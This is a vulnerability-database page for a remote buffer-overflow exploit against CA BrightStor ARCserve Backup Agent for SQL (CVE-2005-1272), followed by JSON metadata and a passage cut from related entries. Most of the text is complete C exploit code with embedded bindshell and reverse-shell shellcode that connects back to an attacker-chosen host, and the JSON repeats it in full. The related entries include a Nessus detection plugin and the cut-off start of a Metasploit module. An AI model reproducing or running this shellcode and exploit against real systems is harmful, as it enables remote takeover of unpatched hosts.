Search...

CA BrightStor ARCserve Backup Agent dbasqlr.exe Remote Exploit

2005-08-03T00:00:00

ID EDB-ID:1130
Type exploitdb
Reporter cybertronic
Modified 2005-08-03T00:00:00

Description

CA BrightStor ARCserve Backup Agent (dbasqlr.exe) Remote Exploit. CVE-2005-1272. Remote exploit for windows platform

                                        
                                            /*
 * CA BrightStor ARCserve Backup Agent for SQL - dbasqlr.exe
 *
 * cybertronic[at]gmx[dot]net
 *
 */

#include &lt;stdio.h&gt;
#include &lt;sys/socket.h&gt;
#include &lt;netinet/in.h&gt;
#include &lt;netdb.h&gt;

#define PORT 6070

unsigned char bindshell[] =
"\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff\xff\xff\x81\x36\x80\xbf\x32"
"\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
"\x03\x53\x06\x1f\x74\x57\x75\x95\x80\xbf\xbb\x92\x7f\x89\x5a\x1a"
"\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09\xf9\x3a\x6b\xb6\xd7\x9f\x4d"
"\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6\xb3\x5a\xf8\xec\xbf\x32\xfc"
"\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf\xeb\xcd\xc2\x88\x36\x74\x90"
"\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad\xbe\x32\x94\x09\xf9\x22\x6b"
"\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81\xbf\x32\x1d\xc6\xab\xcd\xe2"
"\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81\xbf\x32\x1d\xc6\xa7\xcd\xe2"
"\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80\xbf\x32\x1d\xc6\xa3\xcd\xe2"
"\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80\xbf\x32\x1d\xc6\x9f\xcd\xe2"
"\x84\xd7\x96\x39\xae\x56\xda\x4a\x80\xbf\x32\x1d\xc6\x9b\xcd\xe2"
"\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80\xbf\x32\x1d\xc6\x97\xcd\xe2"
"\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80\xbf\x32\x1d\xc6\x93\x01\x6b"
"\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81\xbe\x32\x94\x7f\xe9\x2a\xc4"
"\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6\xa3\xb9\x4c\xd7\xe8\x5a\x96"
"\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3\x40\x64\xb4\xd7\xec\xcd\xc2"
"\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50\xd7\x57\xec\xe5\xbf\x5a\xf7"
"\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4\x32\x0e\xb0\xb3\x7f\x01\x5d"
"\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4\xaf\x76\x6a\xc4\x9b\x0f\x1d"
"\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4\x9b\x62\x19\xc4\x9b\x22\xc0"
"\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f\xc9\x02\xc5\x7f\xe9\x22\x1f"
"\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b\x77\x65\x6b\xd6\x93\xcd\xc2"
"\x94\xea\x64\xf0\x21\x8f\x32\x94\x80\x3a\xf2\xec\x8c\x34\x72\x98"
"\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89\x34\x72\xa0\x0b\x17\x8a\x94"
"\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80\xec\x67\xc2\xd7\x34\x5e\xb0"
"\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83\x6a\xb9\xde\x98\x34\x68\xb4"
"\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83\x4a\x01\x6b\x7c\x8c\xf2\x38"
"\xba\x7b\x46\x93\x41\x70\x3f\x97\x78\x54\xc0\xaf\xfc\x9b\x26\xe1"
"\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c\xf4\xb9\xce\x9c\xbc\xef\x1f"
"\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b\x6a\x6d\xca\xdd\xe4\xf0\x90"
"\x80\x2f\xa2\x04";

unsigned char reverseshell[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9"
"\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3"
"\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE"
"\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99"
"\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF"
"\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6"
"\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF"
"\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD"
"\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD"
"\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD"
"\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66"
"\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66"
"\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB"
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75"
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2"
"\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";

void
exploit ( int s, unsigned long cbip, unsigned short cbport, int option )
{
	unsigned long pushesp = 0x20c0c1ab;
	char buffer[3289];

	bzero ( &buffer, sizeof ( buffer ) );
	memset ( buffer, 0x41, sizeof ( buffer ) - 1 );
	memcpy ( buffer + 1337, "\x81\xc4\x54\xf2\xff\xff", 6 );
	memcpy ( buffer + 3168, ( unsigned char* ) &pushesp, 4 );
	memcpy ( buffer + 3172, "\xe9\xd0\xf8\xff\xff", 5 );

	if ( option == 0 )
	{
		memcpy ( &reverseshell[111], &cbip, 4);
		memcpy ( &reverseshell[118], &cbport, 2);
		memcpy ( buffer + 1343, reverseshell, sizeof ( reverseshell ) - 1 );
	}
	else
		memcpy ( buffer + 1343, bindshell, sizeof ( bindshell ) - 1 );

	printf ( "attacking with %u bytes...", strlen ( buffer ) );
	write ( s, buffer, strlen ( buffer ) );
	printf ( "done!\n" );
	close ( s );
}

int
main ( int argc, char* argv[] )
{
	int s;
	unsigned long cbip;
	unsigned short cbport;
	struct sockaddr_in remote_addr;
	struct hostent* host_addr;

	if ( argc != 2 )
		if ( argc != 4 )
			{ fprintf ( stderr, "Usage\n-----\n[bindshell] %s &lt;ip&gt;\n[reverseshell] %s &lt;ip&gt; &lt;cbip&gt; &lt;cbport&gt;\n", argv[0], argv[0] ); exit ( 1 ); }

	if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
		{ fprintf ( stderr, "Cannot resolve hostname: %s\n", argv[1] ); exit ( 1 ); }

	remote_addr.sin_family = AF_INET;
	remote_addr.sin_addr   = * ( ( struct in_addr * ) host_addr-&gt;h_addr );
	remote_addr.sin_port   = htons ( PORT );

	s = socket ( AF_INET, SOCK_STREAM, 0 );
	printf ( "connecting to %s:%u...", argv[1], PORT );
	if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ==  -1 )
		{ printf ( "failed!\n" ); exit ( 1 ); }
	printf ( "ok!\n" );

	if ( argc == 4 )
	{
		cbip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;
		cbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;
		exploit ( s, cbip, cbport, 0 );
	}
	else
		exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 );
}

// milw0rm.com [2005-08-03]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:1130", "hash": "87cb5a15f7524394e19d1d7dad04aba1", "type": "exploitdb", "bulletinFamily": "exploit", "title": "CA BrightStor ARCserve Backup Agent dbasqlr.exe Remote Exploit", "description": "CA BrightStor ARCserve Backup Agent (dbasqlr.exe) Remote Exploit. CVE-2005-1272. Remote exploit for windows platform", "published": "2005-08-03T00:00:00", "modified": "2005-08-03T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/1130/", "reporter": "cybertronic", "references": [], "cvelist": ["CVE-2005-1272"], "lastseen": "2016-01-31T13:36:19", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-1272"]}, {"type": "exploitdb", "idList": ["EDB-ID:16403"]}, {"type": "nessus", "idList": ["ARCSERVE_MSSQL_AGENT_OVERFLOW.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:9373"]}, {"type": "saint", "idList": ["SAINT:C19DEFBDF9159625288D16104849FCAC", "SAINT:6A1974057004A5AC78290EDEE636728C", "SAINT:7AACFCE7244CB5A12AA6DCF88C28DB9E"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/SQL_AGENT"]}, {"type": "cert", "idList": ["VU:279774"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83109"]}, {"type": "osvdb", "idList": ["OSVDB:18501"]}], "modified": "2016-01-31T13:36:19"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/1130/", "sourceData": "/*\r\n * CA BrightStor ARCserve Backup Agent for SQL - dbasqlr.exe\r\n *\r\n * cybertronic[at]gmx[dot]net\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n\r\n#define PORT 6070\r\n\r\nunsigned char bindshell[] =\r\n\"\\xeb\\x19\\x5e\\x31\\xc9\\x81\\xe9\\x89\\xff\\xff\\xff\\x81\\x36\\x80\\xbf\\x32\"\r\n\"\\x94\\x81\\xee\\xfc\\xff\\xff\\xff\\xe2\\xf2\\xeb\\x05\\xe8\\xe2\\xff\\xff\\xff\"\r\n\"\\x03\\x53\\x06\\x1f\\x74\\x57\\x75\\x95\\x80\\xbf\\xbb\\x92\\x7f\\x89\\x5a\\x1a\"\r\n\"\\xce\\xb1\\xde\\x7c\\xe1\\xbe\\x32\\x94\\x09\\xf9\\x3a\\x6b\\xb6\\xd7\\x9f\\x4d\"\r\n\"\\x85\\x71\\xda\\xc6\\x81\\xbf\\x32\\x1d\\xc6\\xb3\\x5a\\xf8\\xec\\xbf\\x32\\xfc\"\r\n\"\\xb3\\x8d\\x1c\\xf0\\xe8\\xc8\\x41\\xa6\\xdf\\xeb\\xcd\\xc2\\x88\\x36\\x74\\x90\"\r\n\"\\x7f\\x89\\x5a\\xe6\\x7e\\x0c\\x24\\x7c\\xad\\xbe\\x32\\x94\\x09\\xf9\\x22\\x6b\"\r\n\"\\xb6\\xd7\\x4c\\x4c\\x62\\xcc\\xda\\x8a\\x81\\xbf\\x32\\x1d\\xc6\\xab\\xcd\\xe2\"\r\n\"\\x84\\xd7\\xf9\\x79\\x7c\\x84\\xda\\x9a\\x81\\xbf\\x32\\x1d\\xc6\\xa7\\xcd\\xe2\"\r\n\"\\x84\\xd7\\xeb\\x9d\\x75\\x12\\xda\\x6a\\x80\\xbf\\x32\\x1d\\xc6\\xa3\\xcd\\xe2\"\r\n\"\\x84\\xd7\\x96\\x8e\\xf0\\x78\\xda\\x7a\\x80\\xbf\\x32\\x1d\\xc6\\x9f\\xcd\\xe2\"\r\n\"\\x84\\xd7\\x96\\x39\\xae\\x56\\xda\\x4a\\x80\\xbf\\x32\\x1d\\xc6\\x9b\\xcd\\xe2\"\r\n\"\\x84\\xd7\\xd7\\xdd\\x06\\xf6\\xda\\x5a\\x80\\xbf\\x32\\x1d\\xc6\\x97\\xcd\\xe2\"\r\n\"\\x84\\xd7\\xd5\\xed\\x46\\xc6\\xda\\x2a\\x80\\xbf\\x32\\x1d\\xc6\\x93\\x01\\x6b\"\r\n\"\\x01\\x53\\xa2\\x95\\x80\\xbf\\x66\\xfc\\x81\\xbe\\x32\\x94\\x7f\\xe9\\x2a\\xc4\"\r\n\"\\xd0\\xef\\x62\\xd4\\xd0\\xff\\x62\\x6b\\xd6\\xa3\\xb9\\x4c\\xd7\\xe8\\x5a\\x96\"\r\n\"\\x80\\xae\\x6e\\x1f\\x4c\\xd5\\x24\\xc5\\xd3\\x40\\x64\\xb4\\xd7\\xec\\xcd\\xc2\"\r\n\"\\xa4\\xe8\\x63\\xc7\\x7f\\xe9\\x1a\\x1f\\x50\\xd7\\x57\\xec\\xe5\\xbf\\x5a\\xf7\"\r\n\"\\xed\\xdb\\x1c\\x1d\\xe6\\x8f\\xb1\\x78\\xd4\\x32\\x0e\\xb0\\xb3\\x7f\\x01\\x5d\"\r\n\"\\x03\\x7e\\x27\\x3f\\x62\\x42\\xf4\\xd0\\xa4\\xaf\\x76\\x6a\\xc4\\x9b\\x0f\\x1d\"\r\n\"\\xd4\\x9b\\x7a\\x1d\\xd4\\x9b\\x7e\\x1d\\xd4\\x9b\\x62\\x19\\xc4\\x9b\\x22\\xc0\"\r\n\"\\xd0\\xee\\x63\\xc5\\xea\\xbe\\x63\\xc5\\x7f\\xc9\\x02\\xc5\\x7f\\xe9\\x22\\x1f\"\r\n\"\\x4c\\xd5\\xcd\\x6b\\xb1\\x40\\x64\\x98\\x0b\\x77\\x65\\x6b\\xd6\\x93\\xcd\\xc2\"\r\n\"\\x94\\xea\\x64\\xf0\\x21\\x8f\\x32\\x94\\x80\\x3a\\xf2\\xec\\x8c\\x34\\x72\\x98\"\r\n\"\\x0b\\xcf\\x2e\\x39\\x0b\\xd7\\x3a\\x7f\\x89\\x34\\x72\\xa0\\x0b\\x17\\x8a\\x94\"\r\n\"\\x80\\xbf\\xb9\\x51\\xde\\xe2\\xf0\\x90\\x80\\xec\\x67\\xc2\\xd7\\x34\\x5e\\xb0\"\r\n\"\\x98\\x34\\x77\\xa8\\x0b\\xeb\\x37\\xec\\x83\\x6a\\xb9\\xde\\x98\\x34\\x68\\xb4\"\r\n\"\\x83\\x62\\xd1\\xa6\\xc9\\x34\\x06\\x1f\\x83\\x4a\\x01\\x6b\\x7c\\x8c\\xf2\\x38\"\r\n\"\\xba\\x7b\\x46\\x93\\x41\\x70\\x3f\\x97\\x78\\x54\\xc0\\xaf\\xfc\\x9b\\x26\\xe1\"\r\n\"\\x61\\x34\\x68\\xb0\\x83\\x62\\x54\\x1f\\x8c\\xf4\\xb9\\xce\\x9c\\xbc\\xef\\x1f\"\r\n\"\\x84\\x34\\x31\\x51\\x6b\\xbd\\x01\\x54\\x0b\\x6a\\x6d\\xca\\xdd\\xe4\\xf0\\x90\"\r\n\"\\x80\\x2f\\xa2\\x04\";\r\n\r\nunsigned char reverseshell[] =\r\n\"\\xEB\\x10\\x5B\\x4B\\x33\\xC9\\x66\\xB9\\x25\\x01\\x80\\x34\\x0B\\x99\\xE2\\xFA\"\r\n\"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF\\x70\\x62\\x99\\x99\\x99\\xC6\\xFD\\x38\\xA9\"\r\n\"\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\\xE9\\x85\\x34\\x12\\xF1\\x91\\x12\\x6E\\xF3\"\r\n\"\\x9D\\xC0\\x71\\x02\\x99\\x99\\x99\\x7B\\x60\\xF1\\xAA\\xAB\\x99\\x99\\xF1\\xEE\"\r\n\"\\xEA\\xAB\\xC6\\xCD\\x66\\x8F\\x12\\x71\\xF3\\x9D\\xC0\\x71\\x1B\\x99\\x99\\x99\"\r\n\"\\x7B\\x60\\x18\\x75\\x09\\x98\\x99\\x99\\xCD\\xF1\\x98\\x98\\x99\\x99\\x66\\xCF\"\r\n\"\\x89\\xC9\\xC9\\xC9\\xC9\\xD9\\xC9\\xD9\\xC9\\x66\\xCF\\x8D\\x12\\x41\\xF1\\xE6\"\r\n\"\\x99\\x99\\x98\\xF1\\x9B\\x99\\x9D\\x4B\\x12\\x55\\xF3\\x89\\xC8\\xCA\\x66\\xCF\"\r\n\"\\x81\\x1C\\x59\\xEC\\xD3\\xF1\\xFA\\xF4\\xFD\\x99\\x10\\xFF\\xA9\\x1A\\x75\\xCD\"\r\n\"\\x14\\xA5\\xBD\\xF3\\x8C\\xC0\\x32\\x7B\\x64\\x5F\\xDD\\xBD\\x89\\xDD\\x67\\xDD\"\r\n\"\\xBD\\xA4\\x10\\xC5\\xBD\\xD1\\x10\\xC5\\xBD\\xD5\\x10\\xC5\\xBD\\xC9\\x14\\xDD\"\r\n\"\\xBD\\x89\\xCD\\xC9\\xC8\\xC8\\xC8\\xF3\\x98\\xC8\\xC8\\x66\\xEF\\xA9\\xC8\\x66\"\r\n\"\\xCF\\x9D\\x12\\x55\\xF3\\x66\\x66\\xA8\\x66\\xCF\\x91\\xCA\\x66\\xCF\\x85\\x66\"\r\n\"\\xCF\\x95\\xC8\\xCF\\x12\\xDC\\xA5\\x12\\xCD\\xB1\\xE1\\x9A\\x4C\\xCB\\x12\\xEB\"\r\n\"\\xB9\\x9A\\x6C\\xAA\\x50\\xD0\\xD8\\x34\\x9A\\x5C\\xAA\\x42\\x96\\x27\\x89\\xA3\"\r\n\"\\x4F\\xED\\x91\\x58\\x52\\x94\\x9A\\x43\\xD9\\x72\\x68\\xA2\\x86\\xEC\\x7E\\xC3\"\r\n\"\\x12\\xC3\\xBD\\x9A\\x44\\xFF\\x12\\x95\\xD2\\x12\\xC3\\x85\\x9A\\x44\\x12\\x9D\"\r\n\"\\x12\\x9A\\x5C\\x32\\xC7\\xC0\\x5A\\x71\\x99\\x66\\x66\\x66\\x17\\xD7\\x97\\x75\"\r\n\"\\xEB\\x67\\x2A\\x8F\\x34\\x40\\x9C\\x57\\x76\\x57\\x79\\xF9\\x52\\x74\\x65\\xA2\"\r\n\"\\x40\\x90\\x6C\\x34\\x75\\x60\\x33\\xF9\\x7E\\xE0\\x5F\\xE0\";\r\n\r\nvoid\r\nexploit ( int s, unsigned long cbip, unsigned short cbport, int option )\r\n{\r\n\tunsigned long pushesp = 0x20c0c1ab;\r\n\tchar buffer[3289];\r\n\r\n\tbzero ( &buffer, sizeof ( buffer ) );\r\n\tmemset ( buffer, 0x41, sizeof ( buffer ) - 1 );\r\n\tmemcpy ( buffer + 1337, \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", 6 );\r\n\tmemcpy ( buffer + 3168, ( unsigned char* ) &pushesp, 4 );\r\n\tmemcpy ( buffer + 3172, \"\\xe9\\xd0\\xf8\\xff\\xff\", 5 );\r\n\r\n\tif ( option == 0 )\r\n\t{\r\n\t\tmemcpy ( &reverseshell[111], &cbip, 4);\r\n\t\tmemcpy ( &reverseshell[118], &cbport, 2);\r\n\t\tmemcpy ( buffer + 1343, reverseshell, sizeof ( reverseshell ) - 1 );\r\n\t}\r\n\telse\r\n\t\tmemcpy ( buffer + 1343, bindshell, sizeof ( bindshell ) - 1 );\r\n\r\n\tprintf ( \"attacking with %u bytes...\", strlen ( buffer ) );\r\n\twrite ( s, buffer, strlen ( buffer ) );\r\n\tprintf ( \"done!\\n\" );\r\n\tclose ( s );\r\n}\r\n\r\nint\r\nmain ( int argc, char* argv[] )\r\n{\r\n\tint s;\r\n\tunsigned long cbip;\r\n\tunsigned short cbport;\r\n\tstruct sockaddr_in remote_addr;\r\n\tstruct hostent* host_addr;\r\n\r\n\tif ( argc != 2 )\r\n\t\tif ( argc != 4 )\r\n\t\t\t{ fprintf ( stderr, \"Usage\\n-----\\n[bindshell] %s <ip>\\n[reverseshell] %s <ip> <cbip> <cbport>\\n\", argv[0], argv[0] ); exit ( 1 ); }\r\n\r\n\tif ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )\r\n\t\t{ fprintf ( stderr, \"Cannot resolve hostname: %s\\n\", argv[1] ); exit ( 1 ); }\r\n\r\n\tremote_addr.sin_family = AF_INET;\r\n\tremote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );\r\n\tremote_addr.sin_port = htons ( PORT );\r\n\r\n\ts = socket ( AF_INET, SOCK_STREAM, 0 );\r\n\tprintf ( \"connecting to %s:%u...\", argv[1], PORT );\r\n\tif ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )\r\n\t\t{ printf ( \"failed!\\n\" ); exit ( 1 ); }\r\n\tprintf ( \"ok!\\n\" );\r\n\r\n\tif ( argc == 4 )\r\n\t{\r\n\t\tcbip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;\r\n\t\tcbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;\r\n\t\texploit ( s, cbip, cbport, 0 );\r\n\t}\r\n\telse\r\n\t\texploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 );\r\n}\n\n// milw0rm.com [2005-08-03]\n", "osvdbidlist": ["18501"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2017-07-11T11:14:52", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in the Backup Agent for Microsoft SQL Server in BrightStor ARCserve Backup Agent for SQL Server 11.0 allows remote attackers to execute arbitrary code via a long string sent to port (1) 6070 or (2) 6050.", "modified": "2017-07-10T21:32:36", "published": "2005-08-05T00:00:00", "id": "CVE-2005-1272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1272", "title": "CVE-2005-1272", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-01-16T20:06:16", "bulletinFamily": "scanner", "description": "This host is running BrightStor ARCServe MSSQL Agent.\n\nThe remote version of this software is susceptible to a buffer\noverflow attack. \n\nAn attacker, by sending a specially crafted packet, may be able to\nexecute code on the remote host.", "modified": "2018-11-15T00:00:00", "published": "2005-08-05T00:00:00", "id": "ARCSERVE_MSSQL_AGENT_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=19387", "title": "CA BrightStor ARCserve Backup Agent for Windows Long String Overflow", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19387);\n script_version (\"1.20\");\n\n script_cve_id(\"CVE-2005-1272\");\n script_bugtraq_id(14453);\n script_xref(name:\"CERT\", value:\"279774\");\n\n script_name(english:\"CA BrightStor ARCserve Backup Agent for Windows Long String Overflow\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host.\" );\n script_set_attribute(attribute:\"description\", value:\n\"This host is running BrightStor ARCServe MSSQL Agent.\n\nThe remote version of this software is susceptible to a buffer\noverflow attack. \n\nAn attacker, by sending a specially crafted packet, may be able to\nexecute code on the remote host.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.kb.cert.org/vuls/id/279774/\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the patch or upgrade to a newer version when available.\n\nNote that for ARCServe 11.1, patch QO70767 (not working) has been\nreplaced by patch QO71010.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CA BrightStor Agent for Microsoft SQL Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/08/05\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/08/02\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2005/09/02\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n script_summary(english:\"Check buffer overflow in BrightStor ARCServe MSSQL Agent\");\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"arcserve_mssql_agent_detect.nasl\");\n script_require_keys(\"ARCSERVE/MSSQLAgent\");\n script_require_ports (6070);\n exit(0);\n}\n\nif (!get_kb_item (\"ARCSERVE/MSSQLAgent\")) exit (0);\n\nport = 6070;\nif ( ! get_port_state(port) ) exit(0);\nsoc = open_sock_tcp (port);\nif (!soc) exit(0);\n\nreq = \"[LUHISL\" + crap(data:\"A\", length:18) + crap (data:\"B\", length:669) + raw_string (0x01, 0x06) + crap (data:\"C\", length:0x106) + crap (data:\"D\", length:0x106);\n\nsend (socket:soc, data:req);\nbuf = recv(socket:soc, length:1000);\n\nif (strlen(buf) > 8)\n{\n val = raw_string (0x00,0x00,0x04,0x1b,0x00,0x00,0x00,0x00);\n\n header = substr(buf,0,7);\n if (val >< header)\n security_hole(port);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-01T23:47:29", "bulletinFamily": "exploit", "description": "CA BrightStor Agent for Microsoft SQL Overflow. CVE-2005-1272. Remote exploit for windows platform", "modified": "2010-04-30T00:00:00", "published": "2010-04-30T00:00:00", "id": "EDB-ID:16403", "href": "https://www.exploit-db.com/exploits/16403/", "type": "exploitdb", "title": "CA BrightStor Agent for Microsoft SQL Overflow", "sourceData": "##\r\n# $Id: sql_agent.rb 9179 2010-04-30 08:40:19Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'CA BrightStor Agent for Microsoft SQL Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the CA BrightStor\r\n\t\t\t\tAgent for Microsoft SQL Server. This vulnerability was\r\n\t\t\t\tdiscovered by cybertronic[at]gmx.net.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9179 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2005-1272'],\r\n\t\t\t\t\t[ 'OSVDB', '18501' ],\r\n\t\t\t\t\t[ 'BID', '14453'],\r\n\t\t\t\t\t[ 'URL', 'http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities'],\r\n\t\t\t\t\t[ 'URL', 'http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# This exploit requires a jmp esp for return\r\n\t\t\t\t\t['ARCServe 11.0 Asbrdcst.dll 12/12/2003', { 'Platform' => 'win', 'Ret' => 0x20c11d64 }], # jmp esp\r\n\t\t\t\t\t['ARCServe 11.1 Asbrdcst.dll 07/21/2004', { 'Platform' => 'win', 'Ret' => 0x20c0cd5b }], # push esp, ret\r\n\t\t\t\t\t['ARCServe 11.1 SP1 Asbrdcst.dll 01/14/2005', { 'Platform' => 'win', 'Ret' => 0x20c0cd1b }], # push esp, ret\r\n\r\n\t\t\t\t\t# Generic jmp 